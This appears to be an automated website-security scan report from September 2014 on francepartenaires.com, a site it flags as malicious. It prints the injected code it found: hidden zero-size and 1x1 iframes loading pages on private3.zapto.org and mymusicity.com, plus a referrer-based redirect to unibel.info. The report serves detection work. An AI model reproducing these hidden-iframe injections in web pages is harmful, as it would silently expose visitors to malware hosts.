Malicious/Suspicious Redirects
Request | Server response | Status |
URL: http://francepartenaires.com/ (imitation of visitor from search engine) GET / HTTP/1.1 Host: francepartenaires.com Referer: http://www.google.com/search?q=redirect+check1 | HTTP/1.1 301 Moved Permanently Connection: close Date: Thu, 04 Sep 2014 22:02:20 GMT Location: http://unibel.info/shop/show.php Server: Apache Content-Length: 311 Content-Type: text/html; charset=iso-8859-1 | malicious |
Scanned pages/files
Request | Server response | Status |
http://francepartenaires.com/ | 200 OK Content-Length: 3918 Content-Type: text/html | malicious |
Malicious code - confirmed by antiviruses (see below)
Decoded script:
document.write(unescape(WSxQJgvuB)) document.write(unescape(WSxQJgvuB))
<iframe src="http://private3.zapto.org/blog/vlqsryyacr.php?vaowv=NHcCqUFS&hrytewsfd=9889439&yjresfd=854" name="yfejCPCzbA" title="NesXoYGTBz" width="0" height="0" frameborder="0"></iframe>
Antivirus reports:
http://francepartenaires.com/FPM/index.html | 200 OK Content-Length: 3857 Content-Type: text/html | malicious |
Malicious code - confirmed by antiviruses (see below)
Antivirus reports:
Hidden iFrame found.
size: 1x1
src: http://mymusicity.com/common/classes/mtds/go.php?sid=1
<iframe src="http://mymusicity.com/common/classes/mtds/go.php?sid=1" frameborder="0" vspace="0" hspace="0" width="1" height="1" marginwidth="0" marginheight="0" scrolling="no">
http://francepartenaires.com/test404page.js | HTTP/1.1 302 Found Connection: close Date: Thu, 04 Sep 2014 22:02:21 GMT Location: http://unibel.info/shop/show.php Server: Apache Content-Length: 287 Content-Type: text/html; charset=iso-8859-1 | clean |
http://unibel.info/shop/show.php | 500 Can't connect to unibel.info:80 (Bad hostname) Content-Length: 154 Content-Type: text/plain | clean |
http://unibel.info/test404page.js | 500 Can't connect to unibel.info:80 (Bad hostname) Content-Length: 154 Content-Type: text/plain | clean |
Safe Browsing / Blacklists
Query: http://www.google.com/safebrowsing/diagnostic?site=francepartenaires.com
Result: This site is not currently listed as suspicious.
Query: http://yandex.com/infected?l10n=en&url=http://francepartenaires.com/
Result: francepartenaires.com is not infected or malware details are not published yet.